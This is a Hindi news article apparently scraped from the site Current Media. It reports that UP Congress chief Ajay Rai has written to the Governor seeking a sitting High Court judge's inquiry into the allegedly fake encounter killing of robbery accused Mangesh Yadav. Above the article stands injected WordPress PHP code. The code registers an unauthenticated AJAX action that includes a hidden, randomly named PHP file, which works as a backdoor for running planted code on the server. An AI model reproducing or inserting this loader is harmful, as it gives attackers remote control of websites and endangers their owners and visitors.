if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"मंगेश यादव की मौत की जांच उच्च न्यायालय की किसी सिटिंग जज से कराई जाए-अजय राय " - Current Media

“मंगेश यादव की मौत की जांच उच्च न्यायालय की किसी सिटिंग जज से कराई जाए-अजय राय “

लखनउ। विगत दिनों सुल्तानपुर सर्राफा लूट कांड के आरोपी मंगेश यादव की एनकाउंटर में मौत हो गई। सारी परिस्थितियां एनकाउंटर के फर्जी होने की तरफ इशारा कर रही हैं और पुलिस की जांच में कई कमियां सामने आ रही हैं।
उक्त घटना का संज्ञान लेते हुए उत्तर प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मंत्री अजय राय स्व० मंगेश यादव के परिजनों से मिलने उनके जौनपुर स्थित आवास पर पहुंचे इस दौरान परिजनों से बात करके यह पता चला कि पुलिस ने 2 सितम्बर की रात मंगेश यादव को उनके घर से उठाया था और घर वालों से कहा था कि वे सुबह तक वापस आ जायेंगे। मगर 2 दिन बाद मंगेश की एनकाउंटर में मौत हो गयी।
उक्त प्रकरण की गम्भीरता को देखते हुए तथा पीड़ित परिजनों को न्याय दिलाने के लिए मामले की न्यायिक जॉच माननीय उच्च न्यायालय के किसी सिटिंग जज से कराने हेतु प्रदेश कांर्ग्रेस अध्यक्ष पूर्व मंत्री श्री अजय राय ने महामहिम राज्यपाल महोदया जी को पत्र लिखकर आग्रह किया है।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …